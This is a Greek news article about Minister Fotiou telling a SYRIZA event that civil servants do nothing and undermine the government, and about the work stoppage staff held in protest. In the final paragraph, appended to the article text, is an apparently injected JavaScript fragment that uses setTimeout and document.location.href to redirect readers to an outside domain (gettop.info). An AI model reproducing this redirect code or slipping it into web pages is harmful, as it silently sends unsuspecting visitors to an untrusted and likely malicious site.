Φωτίου εναντίον δημoσίων υπαλλήλων: Δεν κάνουν τίποτα, υπονομεύουν την κυβέρνηση

0
5

 

Σε εκδήλωση του ΣΥΡΙΖΑ στη Νέα Σμύρνη παρευρέθη η υπουργός Κοινωνικής Αλληλεγγύης η οποία σε ομιλία της καταφέρθηκε εναντίον των δημοσίων υπαλλήλων κατηγορώντας τους ότι «δεν κάνουν τίποτα και υπονομεύουν την κυβέρνηση».

Προσέθεσε ότι το υπουργείο της «μόνο το 25% είναι νέοι άνθρωποι που ξέρουν γράμματα και με βοηθούν», ενώ ένα άλλο 25% που είναι διευθυντικά στελέχη, τους κατηγορεί ότι την υπονομεύουν.

Κάποιοι μάλιστα, όπως λέει, στέλνουν από μόνοι τους εγκυκλίους «Αν δεν είχα νομικούς συμβούλους δίπλα μου, για αυτά που μου φέρνουν να υπογράψω θα πήγαινα φυλακή», προσθέτει καθώς όπως λέει στέλνουν από μόνοι τους εγκυκλίους για τις οποίες και η ίδια εκ των υστέρων, απορεί.

Στάση εργασίας έκαναν οι υπάλληλοι του υπουργείου της διαμαρτυρόμενοι γι αυτές τις δηλώσεις της εκφράζοντας τη δυσαρέσκειά τους., αναφέροντας ότι ουσιαστικά η κ. Φωτίου είπε ότι «δεν κάνουν τίποτα οι δημόσιοι υπάλληλοι στα υπουργεία και οτι στο υπουργείο που μας ξέρει έναν-έναν, το 15% δουλεύουμε και οι υπόλοιποι την υπονομεύουν».

Οι εργαζόμενοι χαρακτηρίζουν απαράδεκτη τη στάση της κ. Φωτίου και την καλούν να ανακαλέσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here